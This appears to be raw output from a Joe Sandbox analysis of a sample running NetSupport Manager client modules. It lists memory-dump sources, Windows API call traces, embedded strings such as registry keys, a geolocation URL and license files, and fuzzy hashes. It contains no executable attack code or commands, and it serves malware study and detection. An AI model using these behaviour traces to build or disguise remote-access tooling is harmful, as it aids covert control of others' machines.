                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                                                                              • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                                                              • API String ID: 596640303-1725438197
                                                                                                              • Opcode ID: 609e97f705776535a990b82a8e5f18e172a35da44f01400c4fa73658ea828b55
                                                                                                              • Instruction ID: 59613557395ae23f7967247d4baf4cae7550bfc3229e85cd4bc92fe2e2f2b4a8
                                                                                                              • Opcode Fuzzy Hash: 609e97f705776535a990b82a8e5f18e172a35da44f01400c4fa73658ea828b55
                                                                                                              • Instruction Fuzzy Hash: 6B818275E0020AABDF04DBE8CD94FEEF7B5AF59708F504258E82567284DB34BA05CB61
                                                                                                              APIs
                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1106175A
                                                                                                                • Part of subcall function 11061140: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106117C
                                                                                                                • Part of subcall function 11061140: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 110611D4
                                                                                                              • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 110617AB
                                                                                                              • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11061865
                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 11061881
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Enum$Open$CloseValue
                                                                                                              • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                                              • API String ID: 2823542970-1528906934
                                                                                                              • Opcode ID: 4cf0c36994a383612a719e249f3f276c0f36ade9332230c7c569e8670290d878
                                                                                                              • Instruction ID: 3a074a016260bf88f68c0586b8c591cabbb012c9b5ad66670ab8b6bf40d046b4
                                                                                                              • Opcode Fuzzy Hash: 4cf0c36994a383612a719e249f3f276c0f36ade9332230c7c569e8670290d878
                                                                                                              • Instruction Fuzzy Hash: 5F416179E4022DABD724CB55CC81FEAB7BCEB94748F1001D9EA48A6140D6B06E84CFA1
                                                                                                              APIs
                                                                                                                • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                              • GetTickCount.KERNEL32 ref: 11137692
                                                                                                                • Part of subcall function 11096970: CoInitialize.OLE32(00000000), ref: 11096984
                                                                                                                • Part of subcall function 11096970: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,1113769B), ref: 1109699E
                                                                                                                • Part of subcall function 11096970: CoCreateInstance.OLE32(?,00000000,00000001,111C08AC,?,?,?,?,?,?,?,1113769B), ref: 110969BB
                                                                                                                • Part of subcall function 11096970: CoUninitialize.OLE32(?,?,?,?,?,?,1113769B), ref: 110969D9
                                                                                                              • GetTickCount.KERNEL32 ref: 111376A1
                                                                                                              • _memset.LIBCMT ref: 111376E3
                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 111376F9
                                                                                                              • _strrchr.LIBCMT ref: 11137708
                                                                                                              • _free.LIBCMT ref: 1113775A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                                                                              • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                                                              • API String ID: 711243594-1270230032
                                                                                                              • Opcode ID: 4f0f92e27c35dbd641ed9010d5cad7dccc431a8d4141c0f1938ec124a93e63f3
                                                                                                              • Instruction ID: 94b21c48fabd249aebac1ca0d473d12a11480cc4bb4ab1ee9f0f9b3b40903c19
                                                                                                              • Opcode Fuzzy Hash: 4f0f92e27c35dbd641ed9010d5cad7dccc431a8d4141c0f1938ec124a93e63f3
                                                                                                              • Instruction Fuzzy Hash: 9941AE7AE0022E97C710DF756C89BEFF7699B5471DF040079E90493140EAB1AD44CBE1
                                                                                                              APIs
                                                                                                              • ioctlsocket.WSOCK32 ref: 6C797642
                                                                                                              • connect.WSOCK32(00000000,?,?), ref: 6C797659
                                                                                                              • WSAGetLastError.WSOCK32(00000000,?,?), ref: 6C797660
                                                                                                              • _memmove.LIBCMT ref: 6C7976D3
                                                                                                              • select.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6C7976F3
                                                                                                              • GetTickCount.KERNEL32 ref: 6C797717
                                                                                                              • ioctlsocket.WSOCK32 ref: 6C79775C
                                                                                                              • SetLastError.KERNEL32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C797762
                                                                                                              • WSAGetLastError.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6C79777A
                                                                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000), ref: 6C79778B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180719718.000000006C791000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C790000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180699601.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180775211.000000006C7D9000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180831579.000000006C7E0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_6c790000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$ioctlsocket$CountTick_memmoveconnectselect
                                                                                                              • String ID: *BlockingIO$ConnectTimeout$General
                                                                                                              • API String ID: 4218156244-2969206566
                                                                                                              • Opcode ID: 2a775e71e731f528fc182d583a633dc6b54ea45a7c08e713db5e00571a73f9cf
                                                                                                              • Instruction ID: cc836506d42a1161636cab01e9f410847526fabeb2f9d9d5d32c1ddb7e91c40b
                                                                                                              • Opcode Fuzzy Hash: 2a775e71e731f528fc182d583a633dc6b54ea45a7c08e713db5e00571a73f9cf
                                                                                                              • Instruction Fuzzy Hash: 6D41DB719003149BE720DF74DF4CBDE77BAAF45308F1045A9E509A7641EB709A88CFA1
                                                                                                              APIs
                                                                                                                • Part of subcall function 11145440: _memset.LIBCMT ref: 11145485
                                                                                                                • Part of subcall function 11145440: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
                                                                                                                • Part of subcall function 11145440: LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
                                                                                                                • Part of subcall function 11145440: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
                                                                                                                • Part of subcall function 11145440: FreeLibrary.KERNEL32(00000000), ref: 111454EF
                                                                                                                • Part of subcall function 11145440: GetSystemDefaultLangID.KERNEL32 ref: 111454FA
                                                                                                              • AdjustWindowRectEx.USER32(111417B8,00CE0000,00000001,00000001), ref: 11133EC7
                                                                                                              • LoadMenuA.USER32(00000000,000003EC), ref: 11133ED8
                                                                                                              • GetSystemMetrics.USER32(00000021), ref: 11133EE9
                                                                                                              • GetSystemMetrics.USER32(0000000F), ref: 11133EF1
                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 11133EF7
                                                                                                              • GetDC.USER32(00000000), ref: 11133F03
                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 11133F0E
                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 11133F1A
                                                                                                              • CreateWindowExA.USER32(00000001,NSMWClass,0276D278,00CE0000,80000000,80000000,111417B8,?,00000000,?,11000000,00000000), ref: 11133F6F
                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,110F7D09,00000001,111417B8,_debug), ref: 11133F77
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                                                              • String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                                              • API String ID: 1594747848-1114959992
                                                                                                              • Opcode ID: 75f297c2efb98d08cbe097e8d34710f0383f1ebd178d5accfa4770b5d5071ee0
                                                                                                              • Instruction ID: 5297cf036ba1cbd73fc44df567c8a611b910eb11675e7325f2afb4d5e36916b9
                                                                                                              • Opcode Fuzzy Hash: 75f297c2efb98d08cbe097e8d34710f0383f1ebd178d5accfa4770b5d5071ee0
                                                                                                              • Instruction Fuzzy Hash: C4316275E10219ABDB149FF58C85FAFFBB8EB48709F100529FA25B7284D67469008BA4
                                                                                                              APIs
                                                                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102DD98,00000000,E43C2CA5,?,00000000,00000000), ref: 1102CE44
                                                                                                              • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102CE5A
                                                                                                              • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102CE6E
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CE75
                                                                                                              • Sleep.KERNEL32(00000032), ref: 1102CE86
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CE96
                                                                                                              • Sleep.KERNEL32(000003E8), ref: 1102CEE2
                                                                                                              • CloseHandle.KERNEL32(?), ref: 1102CF0F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                                                              • String ID: >$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                                                              • API String ID: 83693535-2077998243
                                                                                                              • Opcode ID: 8822f1513d5873ee506041ece4c3caa14d779e6eafa0361d2a69553500dbb03f
                                                                                                              • Instruction ID: 880dc79335238c7f7dd8ff78cda89552a6d5dde84d0873ba54ec41c4173cff75
                                                                                                              • Opcode Fuzzy Hash: 8822f1513d5873ee506041ece4c3caa14d779e6eafa0361d2a69553500dbb03f
                                                                                                              • Instruction Fuzzy Hash: 27B19475E012259FDB25DFA4CD80BEDB7B5BB48708F5041E9E919AB381DB70AA80CF50
                                                                                                              APIs
                                                                                                              • wsprintfA.USER32 ref: 11132C60
                                                                                                              • GetTickCount.KERNEL32 ref: 11132C91
                                                                                                              • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11132CA4
                                                                                                              • GetTickCount.KERNEL32 ref: 11132CAC
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CountTick$FolderPathwsprintf
                                                                                                              • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
                                                                                                              • API String ID: 1170620360-4157686185
                                                                                                              • Opcode ID: 8db97a347cf6facb783ebfea5336d263050bbd002d3c3d3218a55bc412e7ce30
                                                                                                              • Instruction ID: 1138b9c1199a8041912b1953dd267279d987a2a799c8ea79b9a25deb6d60bab0
                                                                                                              • Opcode Fuzzy Hash: 8db97a347cf6facb783ebfea5336d263050bbd002d3c3d3218a55bc412e7ce30
                                                                                                              • Instruction Fuzzy Hash: F33157BAE4022E67E700AFB0AC84FEDF36C9B9471EF1000A9E915A7145EA72B545C761
                                                                                                              APIs
                                                                                                              • GetVersionExA.KERNEL32(111F0EF0,75BF8400), ref: 111450D0
                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                                              • _memset.LIBCMT ref: 1114512D
                                                                                                                • Part of subcall function 11143000: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,75BF8400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020
                                                                                                              • _strncpy.LIBCMT ref: 111451FA
                                                                                                                • Part of subcall function 11163A2D: __isdigit_l.LIBCMT ref: 11163A52
                                                                                                              • RegCloseKey.KERNEL32(00000000), ref: 11145296
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
                                                                                                              • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                                              • API String ID: 3299820421-2117887902
                                                                                                              • Opcode ID: a6d85e33813e4188b4b6cdba8074358a089f7fb1fdaa889e4758e92ad03e0a5c
                                                                                                              • Instruction ID: 1fcbe558ef897eaa1b38a7330f4b62b9d1ba330f7a3c6d488077e096d0eda0f8
                                                                                                              • Opcode Fuzzy Hash: a6d85e33813e4188b4b6cdba8074358a089f7fb1fdaa889e4758e92ad03e0a5c
                                                                                                              • Instruction Fuzzy Hash: 6D51D9B1E0022BEFEB51CF60CD41F9EF7B9AB04B08F104199F519A7941E7716A48CB91
                                                                                                              APIs
                                                                                                              • _strtok.LIBCMT ref: 11026C26
                                                                                                              • _strtok.LIBCMT ref: 11026C60
                                                                                                              • Sleep.KERNEL32(1102FC53,?,*max_sessions,0000000A,00000000,00000000,00000002), ref: 11026D54
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _strtok$Sleep
                                                                                                              • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                                                                              • API String ID: 2009458258-3774545468
                                                                                                              • Opcode ID: 078eda5116f2816b6dc994d4a65e88964a73d5216bb2e8940b960da01685ed19
                                                                                                              • Instruction ID: 546c7fd96e7e5c201e62e0728b24f9c1e86d1f0ab762c79c207aecf2c2ec1ca9
                                                                                                              • Opcode Fuzzy Hash: 078eda5116f2816b6dc994d4a65e88964a73d5216bb2e8940b960da01685ed19
                                                                                                              • Instruction Fuzzy Hash: A951F375E0525E9BDF11EFA9CC80BBEFBB5EB84308FA44069DC1167284E631A846C742
                                                                                                              APIs
                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,6C7A67B5), ref: 6C798D6B
                                                                                                                • Part of subcall function 6C794F70: LoadLibraryA.KERNEL32(psapi.dll,?,6C798DC8), ref: 6C794F78
                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 6C798DCB
                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 6C798DD8
                                                                                                              • FreeLibrary.KERNEL32(?), ref: 6C798EBF
                                                                                                                • Part of subcall function 6C794FB0: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6C794FC4
                                                                                                                • Part of subcall function 6C794FB0: K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6C798E0D,00000000,?,6C798E0D,00000000,?,00000FA0,?), ref: 6C794FE4
                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6C798EAE
                                                                                                                • Part of subcall function 6C795000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6C795014
                                                                                                                • Part of subcall function 6C795000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6C798E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C795034
